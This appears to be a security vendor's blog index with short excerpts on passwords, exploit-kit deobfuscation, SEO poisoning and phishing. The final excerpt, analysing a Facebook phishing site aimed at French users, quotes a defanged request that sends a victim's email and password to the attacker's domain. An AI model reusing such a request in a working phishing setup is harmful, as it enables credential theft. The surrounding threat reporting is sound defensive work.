Are passwords dead?
Last Friday my friend Bob McMillan wrote an article on Wired (Google Declares War on the Password) which talks about a research paper Google will publish this month. I don’t know how many times we have mentioned how important it is to choose a good set of passwords, at least 1,000 times We have written [...]
Deobfuscating malicious code layer by layer
Article written by David Sánchez Lavado This post explains how to analyze the malicious code used in current Exploit Kits. There are many ways to analyze this type of code, and you can find tools that do most of the job automatically. However, as researchers who like to understand how things work, we are going [...]
Black(hat) Friday and Cyber(crime) Monday
You may be in for more than you bargained for if you plan on looking for the latest Black Friday or Cyber Monday deals online. Cyber criminals are quick to capitalize on new opportunities and have already done so by optimizing their Blackhat SEO campaigns to infect those looking for those hot ticket item deals. [...]
Summer tips
Many people are thinking these days in the summer, where we can enjoy life with family and friends our free time, and we can stop worrying about everything … But do we have to worry? Depends on the habits of each one. I recognize I go on holidays with almost all the gadgets I have, [...]
Teaching Some Security. Asking for help!
After yesterday’s epic fail (I’m still laughing) it’s time to do something about users’ education. Many times I wonder which the best approach to education is, and even though writing white papers and all that kind of serious stuff is useful, the average Joe user won’t ever read it. And that’s a fact. So we [...]
Are Cyber Criminals Targeting Local Events In Your City?
Panda Security has a California based office in Los Angeles. We are located in close proximity to two ongoing wildfires in the Angeles Crest National Forrest that have now burned through at least 30 acres, so naturally we have been keeping an eye on it. To my surprise, I pulled up a Google search for [...]
- Comments Off
Facebook Phishing Site Targets French Users
Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site. Source: Connection: (Passing the victims credentials over to the attacker) GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F (Redirecting [...]
- Comments Off
